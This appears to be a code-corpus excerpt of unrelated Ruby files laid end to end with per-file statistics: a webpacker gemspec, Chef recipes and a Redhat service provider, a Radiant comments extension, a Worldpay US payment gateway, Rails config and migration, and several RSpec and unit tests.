# -*- encoding: utf-8 -*- # stub: webpacker 5.2.1 ruby lib Gem::Specification.new do |s| s.name = "webpacker".freeze s.version = "5.2.1" s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version= s.metadata = { "changelog_uri" => "https://github.com/rails/webpacker/blob/v5.2.1/CHANGELOG.md", "source_code_uri" => "https://github.com/rails/webpacker/tree/v5.2.1" } if s.respond_to? :metadata= s.require_paths = ["lib".freeze] s.authors = ["David Heinemeier Hansson".freeze, "Gaurav Tiwari".freeze] s.date = "2020-08-17" s.email = ["[email protected]".freeze, "[email protected]".freeze] s.homepage = "https://github.com/rails/webpacker".freeze s.licenses = ["MIT".freeze] s.required_ruby_version = Gem::Requirement.new(">= 2.4.0".freeze) s.rubygems_version = "2.7.6.2".freeze s.summary = "Use webpack to manage app-like JavaScript modules in Rails".freeze s.installed_by_version = "2.7.6.2" if s.respond_to? :installed_by_version if s.respond_to? :specification_version then s.specification_version = 4 if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then s.add_runtime_dependency(%q<activesupport>.freeze, [">= 5.2"]) s.add_runtime_dependency(%q<railties>.freeze, [">= 5.2"]) s.add_runtime_dependency(%q<rack-proxy>.freeze, [">= 0.6.1"]) s.add_runtime_dependency(%q<semantic_range>.freeze, [">= 2.3.0"]) s.add_development_dependency(%q<bundler>.freeze, [">= 1.3.0"]) s.add_development_dependency(%q<rubocop>.freeze, ["< 0.69"]) s.add_development_dependency(%q<rubocop-performance>.freeze, [">= 0"]) else s.add_dependency(%q<activesupport>.freeze, [">= 5.2"]) s.add_dependency(%q<railties>.freeze, [">= 5.2"]) s.add_dependency(%q<rack-proxy>.freeze, [">= 0.6.1"]) s.add_dependency(%q<semantic_range>.freeze, [">= 2.3.0"]) s.add_dependency(%q<bundler>.freeze, [">= 1.3.0"]) s.add_dependency(%q<rubocop>.freeze, ["< 0.69"]) s.add_dependency(%q<rubocop-performance>.freeze, [">= 0"]) end else s.add_dependency(%q<activesupport>.freeze, [">= 5.2"]) s.add_dependency(%q<railties>.freeze, [">= 5.2"]) s.add_dependency(%q<rack-proxy>.freeze, [">= 0.6.1"]) s.add_dependency(%q<semantic_range>.freeze, [">= 2.3.0"]) s.add_dependency(%q<bundler>.freeze, [">= 1.3.0"]) s.add_dependency(%q<rubocop>.freeze, ["< 0.69"]) s.add_dependency(%q<rubocop-performance>.freeze, [">= 0"]) end end
48.403846
198
0.656337
e9b3f73a7cdf46e05c661c3ef2d7eba7295967e7
142
# # Cookbook:: build_cookbook # Recipe:: smoke # # Copyright:: 2017, Dru Goradia, All Rights Reserved. include_recipe 'delivery-truck::smoke'
20.285714
53
0.739437
5d48649efab5f86799d64139a9209c9b8a8d2c8d
3,897
require_dependency 'application_controller' class CommentsExtension < Radiant::Extension version "0.0.5" description "Adds blog-like comments and comment functionality to pages." url "http://github.com/ntalbott/radiant-comments/tree/master" define_routes do |map| map.with_options(:controller => 'admin/comments') do |comments| comments.destroy_unapproved_comments '/admin/comments/unapproved/destroy', :action => 'destroy_unapproved', :conditions => {:method => :delete} comments.destroy_spam_comments '/admin/comments/spam/destroy', :action => 'destroy_spam', :conditions => {:method => :delete} comments.connect 'admin/comments/:status', :status => /all|approved|unapproved|spam/, :conditions => { :method => :get } comments.connect 'admin/comments/:status.:format' comments.connect 'admin/pages/:page_id/comments/:status.:format' comments.connect 'admin/pages/:page_id/comments/all.:format' comments.resources :comments, :path_prefix => "/admin", :name_prefix => "admin_", :member => {:approve => :get, :unapprove => :get, :is_spam => :get} comments.admin_page_comments 'admin/pages/:page_id/comments/:action' comments.admin_page_comment 'admin/pages/:page_id/comments/:id/:action' end # This needs to be last, otherwise it hoses the admin routes. map.resources :comments, :name_prefix => "page_", :path_prefix => "*url", :controller => "comments" end def activate Page.send :include, CommentTags Comment Page.class_eval do has_many :comments, :dependent => :destroy, :order => "created_at ASC" has_many :approved_comments, :class_name => "Comment", :conditions => "comments.approved_at IS NOT NULL", :order => "created_at ASC" has_many :unapproved_comments, :class_name => "Comment", :conditions => "comments.approved_at IS NULL", :order => "created_at ASC" attr_accessor :last_comment attr_accessor :selected_comment def has_visible_comments? !(approved_comments.empty? && selected_comment.nil?) end end if admin.respond_to? :page admin.page.edit.add :parts_bottom, "edit_comments_enabled", :before => "edit_timestamp" admin.page.index.add :sitemap_head, "index_head_view_comments" admin.page.index.add :node, "index_view_comments" end admin.tabs.add "Comments", "/admin/comments/unapproved", :visibility => [:all] begin { 'notification' => 'false', 'notification_from' => '', 'notification_to' => '', 'notification_site_name' => '', 'notify_creator' => 'true', 'notify_updater' => 'false', 'akismet_key' => '', 'akismet_url' => '', 'mollom_privatekey' => '', 'mollom_publickey' => '', 'filters_enabled' => 'true', 'auto_approve' => 'true' }.each{|k,v| Radiant::Config.create(:key => "comments.#{k}", :value => v) unless Radiant::Config["comments.#{k}"]} rescue Exception => e puts e end require "fastercsv" ActiveRecord::Base.class_eval do def self.to_csv(*args) find(:all).to_csv(*args) end def export_columns(format = nil) self.class.content_columns.map(&:name) - ['created_at', 'updated_at'] end def to_row(format = nil) export_columns(format).map { |c| self.send(c) } end end Array.class_eval do def to_csv(options = {}) return "" if first.nil? if all? { |e| e.respond_to?(:to_row) } header_row = first.export_columns(options[:format]).to_csv content_rows = map { |e| e.to_row(options[:format]) }.map(&:to_csv) ([header_row] + content_rows).join else FasterCSV.generate_line(self, options) end end end end def deactivate end end
38.205882
149
0.634591
abc1ea722a1e8676182f5d28f538c60706d08f52
866
require 'test_helper' class LiqpayHelperTest < Test::Unit::TestCase include ActiveMerchant::Billing::Integrations def setup @helper = Liqpay::Helper.new(1234, 'merch1', :amount => 500, :currency => 'USD') end def test_basic_helper_fields assert_field 'merchant_id', 'merch1' assert_field 'amount', '500' assert_field 'order_id', '1234' assert_field 'currency', 'USD' assert_field 'version', '1.1' end def test_description @helper.description 'This is my description' assert_field 'description', 'This is my description' end def test_notify_url @helper.notify_url 'http://example.com/notify' assert_field 'server_url', 'http://example.com/notify' end def test_return_url @helper.return_url 'http://example.com/return' assert_field 'result_url', 'http://example.com/return' end end
25.470588
84
0.699769
7a7b2a1c402aad316b1b7f23a1ce17945744bb37
2,514
# # Author:: AJ Christensen (<[email protected]>) # Copyright:: Copyright (c) 2008 Opscode, Inc. # License:: Apache License, Version 2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # require 'chef/provider/service/init' class Chef class Provider class Service class Redhat < Chef::Provider::Service::Init CHKCONFIG_ON = /\d:on/ CHKCONFIG_MISSING = /No such/ def initialize(new_resource, run_context) super @init_command = "/sbin/service #{@new_resource.service_name}" @new_resource.supports[:status] = true @service_missing = false end def define_resource_requirements shared_resource_requirements requirements.assert(:all_actions) do |a| chkconfig_file = "/sbin/chkconfig" a.assertion { ::File.exists? chkconfig_file } a.failure_message Chef::Exceptions::Service, "#{chkconfig_file} does not exist!" end requirements.assert(:start, :enable, :reload, :restart) do |a| a.assertion { !@service_missing } a.failure_message Chef::Exceptions::Service, "#{@new_resource}: unable to locate the init.d script!" a.whyrun "Assuming service would be disabled. The init script is not presently installed." end end def load_current_resource super if ::File.exists?("/sbin/chkconfig") chkconfig = shell_out!("/sbin/chkconfig --list #{@current_resource.service_name}", :returns => [0,1]) @current_resource.enabled(!!(chkconfig.stdout =~ CHKCONFIG_ON)) @service_missing = !!(chkconfig.stderr =~ CHKCONFIG_MISSING) end @current_resource end def enable_service() shell_out! "/sbin/chkconfig #{@new_resource.service_name} on" end def disable_service() shell_out! "/sbin/chkconfig #{@new_resource.service_name} off" end end end end end
33.52
113
0.648369
01bcc9f35fea0afb7bfceb3d3989dd37b0af2630
1,333
require File.expand_path('../boot', __FILE__) # Pick the frameworks you want: require "active_model/railtie" require "active_record/railtie" require "action_controller/railtie" require "action_mailer/railtie" require "action_view/railtie" require "sprockets/railtie" # require "rails/test_unit/railtie" # Require the gems listed in Gemfile, including any gems # you've limited to :test, :development, or :production. Bundler.require(*Rails.groups) module HipsterCi class Application < Rails::Application # Settings in config/environments/* take precedence over those specified here. # Application configuration should go into files in config/initializers # -- all .rb files in that directory are automatically loaded. # Set Time.zone default to the specified zone and make Active Record auto-convert to this zone. # Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC. # config.time_zone = 'Central Time (US & Canada)' # The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded. # config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s] # config.i18n.default_locale = :de config.autoload_paths << 'lib/' config.default_project_access_token = ENV['DEFAULT_PROJECT_ACCESS_TOKEN'] end end
38.085714
99
0.744936
1d67f83c6b1dc20fc805962d3fa0c94f3632b1c0
306
# frozen_string_literal: true class CreateComments < ActiveRecord::Migration[6.0] def change create_table :comments do |t| t.references :user, null: false, foreign_key: true t.references :post, null: false, foreign_key: true t.string :content t.timestamps end end end
21.857143
56
0.689542
21922940277e7efd9da83f2a9da043f4b2728efa
6,569
require "nokogiri" module ActiveMerchant #:nodoc: module Billing #:nodoc: class WorldpayUsGateway < Gateway class_attribute :backup_url self.display_name = "Worldpay US" self.homepage_url = "http://www.worldpay.com/us" # No sandbox, just use test cards. self.live_url = 'https://trans.worldpay.us/cgi-bin/process.cgi' self.backup_url = 'https://trans.gwtx01.com/cgi-bin/process.cgi' self.supported_countries = ['US'] self.default_currency = 'USD' self.money_format = :dollars self.supported_cardtypes = [:visa, :master, :american_express, :discover, :jcb] def initialize(options={}) requires!(options, :acctid, :subid, :merchantpin) super end def purchase(money, payment_method, options={}) post = {} add_invoice(post, money, options) add_payment_method(post, payment_method) add_customer_data(post, options) commit('purchase', options, post) end def authorize(money, payment, options={}) post = {} add_invoice(post, money, options) add_credit_card(post, payment) add_customer_data(post, options) commit('authorize', options, post) end def capture(amount, authorization, options={}) post = {} add_invoice(post, amount, options) add_reference(post, authorization) add_customer_data(post, options) commit('capture', options, post) end def refund(amount, authorization, options={}) post = {} add_invoice(post, amount, options) add_reference(post, authorization) add_customer_data(post, options) commit("refund", options, post) end def void(authorization, options={}) post = {} add_reference(post, authorization) commit('void', options, post) end def verify(credit_card, options={}) MultiResponse.run(:use_first_response) do |r| r.process { authorize(100, credit_card, options) } r.process(:ignore_result) { void(r.authorization, options) } end end private def url(options) options[:use_backup_url].to_s == "true" ? self.backup_url : self.live_url end def add_customer_data(post, options) if(billing_address = (options[:billing_address] || options[:address])) post[:ci_companyname] = billing_address[:company] post[:ci_billaddr1] = billing_address[:address1] post[:ci_billaddr2] = billing_address[:address2] post[:ci_billcity] = billing_address[:city] post[:ci_billstate] = billing_address[:state] post[:ci_billzip] = billing_address[:zip] post[:ci_billcountry] = billing_address[:country] post[:ci_phone] = billing_address[:phone] post[:ci_email] = billing_address[:email] post[:ci_ipaddress] = billing_address[:ip] end if(shipping_address = options[:shipping_address]) post[:ci_shipaddr1] = shipping_address[:address1] post[:ci_shipaddr2] = shipping_address[:address2] post[:ci_shipcity] = shipping_address[:city] post[:ci_shipstate] = shipping_address[:state] post[:ci_shipzip] = shipping_address[:zip] post[:ci_shipcountry] = shipping_address[:country] end end def add_invoice(post, money, options) post[:amount] = amount(money) post[:currencycode] = (options[:currency] || currency(money)) post[:merchantordernumber] = options[:order_id] if options[:order_id] end def add_payment_method(post, payment_method) if card_brand(payment_method) == 'check' add_check(post, payment_method) else add_credit_card(post, payment_method) end end def add_credit_card(post, payment_method) post[:ccname] = payment_method.name post[:ccnum] = payment_method.number post[:cvv2] = payment_method.verification_value post[:expyear] = format(payment_method.year, :four_digits) post[:expmon] = format(payment_method.month, :two_digits) end ACCOUNT_TYPES = { "checking" => "1", "savings" => "2", } def add_check(post, payment_method) post[:action] = 'ns_quicksale_check' post[:ckacct] = payment_method.account_number post[:ckaba] = payment_method.routing_number post[:ckno] = payment_method.number post[:ckaccttype] = ACCOUNT_TYPES[payment_method.account_type] if ACCOUNT_TYPES[payment_method.account_type] end def split_authorization(authorization) historyid, orderid = authorization.split("|") [historyid, orderid] end def add_reference(post, authorization) historyid, orderid = split_authorization(authorization) post[:postonly] = historyid post[:historykeyid] = historyid post[:orderkeyid] = orderid end def parse(xml) response = {} doc = Nokogiri::XML(xml) message = doc.xpath("//plaintext") message.text.split(/\r?\n/).each do |line| key, value = line.split(%r{=}) response[key] = value if key end response end ACTIONS = { "purchase" => "ns_quicksale_cc", "refund" => "ns_credit", "authorize" => "ns_quicksale_cc", "capture" => "ns_quicksale_cc", "void" => "ns_void", } def commit(action, options, post) post[:action] = ACTIONS[action] unless post[:action] post[:acctid] = @options[:acctid] post[:subid] = @options[:subid] post[:merchantpin] = @options[:merchantpin] post[:authonly] = '1' if action == 'authorize' raw = parse(ssl_post(url(options), post.to_query)) succeeded = success_from(raw['result']) Response.new( succeeded, message_from(succeeded, raw), raw, :authorization => authorization_from(raw), :test => test? ) end def success_from(result) result == '1' end def message_from(succeeded, response) if succeeded "Succeeded" else (response['transresult'] || response['Reason'] || "Unable to read error message") end end def authorization_from(response) [response['historyid'], response['orderid']].join("|") end end end end
31.280952
116
0.606485
287d13b14ebc16968a433b4f372fd67a73517a4e
1,413
=begin #Topological Inventory #Topological Inventory The version of the OpenAPI document: 2.0.0 Contact: [email protected] Generated by: https://openapi-generator.tech OpenAPI Generator version: 4.2.1 =end require 'spec_helper' require 'json' require 'date' # Unit tests for TopologicalInventoryApiClient::CollectionMetadata # Automatically generated by openapi-generator (https://openapi-generator.tech) # Please update as you see appropriate describe 'CollectionMetadata' do before do # run before each test @instance = TopologicalInventoryApiClient::CollectionMetadata.new end after do # run after each test end describe 'test an instance of CollectionMetadata' do it 'should create an instance of CollectionMetadata' do expect(@instance).to be_instance_of(TopologicalInventoryApiClient::CollectionMetadata) end end describe 'test attribute "count"' do it 'should work' do # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers end end describe 'test attribute "limit"' do it 'should work' do # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers end end describe 'test attribute "offset"' do it 'should work' do # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers end end end
26.166667
102
0.745223
ff3be0ec0813fae3a355fc2079eb73e8cae2ee2e
443
=begin #Aspose.ThreeD Cloud API Reference #No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) OpenAPI spec version: 3.0 Generated by: https://github.com/swagger-api/swagger-codegen.git Swagger Codegen version: 2.4.11-SNAPSHOT =end require 'date' module AsposeThreeDCloud class DracoCompressionLevel NoCompression = 0, Fast =1, Standard = 2, Optimal = 3 end end
15.821429
102
0.740406
ac82951bcad3814cec26dd0cf87f5580d130de0f
784
# frozen_string_literal: true require 'spec_helper' RSpec.describe EE::BulkImports::Groups::Graphql::GetEpicsQuery do it 'has a valid query' do context = BulkImports::Pipeline::Context.new(create(:bulk_import_tracker)) result = GitlabSchema.execute( described_class.to_s, variables: described_class.variables(context) ).to_h expect(result['errors']).to be_blank end describe '#data_path' do it 'returns data path' do expected = %w[data group epics nodes] expect(described_class.data_path).to eq(expected) end end describe '#page_info_path' do it 'returns pagination information path' do expected = %w[data group epics page_info] expect(described_class.page_info_path).to eq(expected) end end end
23.757576
78
0.710459
085be46734cecd31d667a3840c79a27cc6ed9e31
74
module Backbone module NestedAttributes VERSION = "0.5.0" end end
12.333333
25
0.702703